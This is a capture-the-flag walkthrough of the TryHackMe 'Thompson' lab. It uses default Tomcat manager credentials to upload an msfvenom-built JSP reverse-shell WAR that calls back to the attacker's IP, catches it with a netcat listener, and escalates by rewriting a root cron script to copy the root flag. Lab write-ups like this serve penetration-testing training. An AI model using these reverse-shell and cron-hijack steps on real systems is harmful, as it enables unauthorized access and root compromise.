TryHackMe Thompson
Hello Everyone! Today we are going to solve the TryHackMe machine Thompson
Firstly, connect to the THM machine using VPN and start the machine
Start with Nmap scan to find out the open ports and services running on the machine
Note: If you are running as root, you don’t need to use sudo command
nmap -Pn 10.10.195.168
Perform the advance scan to find out the service versions running on the system
nmap -sC -sV -A 10.10.195.168
Let’s check the IP-address in the browser to find the details in webpage
Check all the pages so that we can find any information, if we open the manager app we can see it is asking for the password
Once we click on cancel we can see it is giving us the username as “tomcat”and password as “s3cret”
Now, try to login with the credentials
We successfully logged into the manager app and we can see lot of directories and information inside and we can see that we can upload a WAR file
Now we can upload a payload and get the reverse shell and it is only accepting the file format as war. Try googling the payload and see what we can find
We found a command to generate a payload to get the reverse shell
ifconfig tun0
The LHOST is our tun0 IP and LPORT we can give any random port
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.6.93 LPORT=1234 -f war > shell.war
Now upload the shell.war file in the website and before that make sure where it is uploading and confirm that it has uploaded successfully
We can see that it has uploaded under the /manger and we can see our shell has uploaded successfully. Now, start the netcat listener with given port and click on the shell file in the browser and we successfully got our connection
nc -nlvp 1234
Check the user and the current working directory
In the /home/jack folder we found our user flag and to escalate privileges and get the root shell we need to find a way
cat user.txt
Get an interactive shell using python so that we can understand everything
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Now, we have seen another file id.sh and it has all the permission and check whether it runs all the time with the root privileges or not. Go to /etc/crontab
cat /etc/crontab
We can see it runs all the time and only in /home/jack directory it runs and using that we can copy the root flag from /root/root.txt directory and save it to a new file finalflag.txt
echo “cat /root/root.txt > finalflag.txt” > id.sh
Wait for a minute to run the cronjob and we can see our finalflag.txt file
ls
We finally got our root flag, there are other methods also get the flag but I just directly copied from the /root directory to get the flag
cat finalflag.txt
Finally we successfully completed the machine
This concludes the room and both flags have been captured!